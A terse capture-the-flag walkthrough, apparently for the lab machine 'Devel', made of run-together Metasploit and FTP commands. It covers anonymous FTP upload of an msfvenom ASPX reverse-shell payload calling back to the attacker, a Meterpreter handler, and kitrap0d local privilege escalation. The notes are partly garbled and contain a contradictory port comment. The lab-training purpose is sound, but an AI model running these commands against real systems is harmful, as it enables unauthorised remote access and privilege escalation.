Devel
ftp 10.10.10.5 anonymous anonymous ls pwd put dog.jpg lsmsfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f aspx > ex.aspxsudo msfconsole use exploit/multi/handler options set payload windows/meterpreter/reverse_tcp options set LHOST 10.10.14.24 runbinary <-- swith to binary instead of ascii put ex.aspxsysinfo getuidbackground search suggester use post/multi/recon/local_exploit_suggester options set SESSION 1 runuse exploit/windows/local/ms10_015_kitrap0d options set SESSION 1 options run options set lhost 10.10.14.24 <-- make sure using the right interface set lport 4445 <-- Need to use different port since 4445 already in use options run
Last updated